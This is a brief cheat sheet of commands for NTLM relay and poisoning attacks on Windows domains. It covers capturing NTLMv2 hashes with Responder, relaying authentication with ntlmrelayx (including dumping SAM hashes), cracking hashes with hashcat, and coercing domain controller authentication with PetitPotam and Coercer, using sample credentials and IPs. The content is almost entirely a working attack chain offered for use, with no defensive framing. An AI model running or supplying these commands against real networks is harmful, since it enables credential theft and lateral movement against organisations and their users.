NTLM relay and poisoning attacks — capture NTLMv2 hashes via Responder, relay authentication to other hosts, and coerce authentication from targets.
No Creds
-
# Capture NTLMv2 hashes sudo responder -I eth0 # Relay (requires SMB signing disabled: nxc smb 10.10.10.27 --gen-relay-list relay.txt) impacket-ntlmrelayx -tf targets.txt -smb2support impacket-ntlmrelayx -tf targets.txt -smb2support --dump-sam # Crack captured hashes hashcat -m 5600 captured_hashes.txt /usr/share/wordlists/rockyou.txt
Credentials
-
# PetitPotam — coerce NTLM auth from DC (authenticated) python3 PetitPotam.py -u sec_user -p 'P@ssw0rd' -d senshu.local 10.10.10.21 10.10.10.27 # Coercer — automated authentication coercion python3 Coercer.py coerce -u sec_user -p 'P@ssw0rd' -d senshu.local -l 10.10.10.21 -t 10.10.10.27
https://github.com/lgandx/Responder
https://github.com/fortra/impacket
https://github.com/topotam/PetitPotam
https://github.com/p0dalirius/Coercer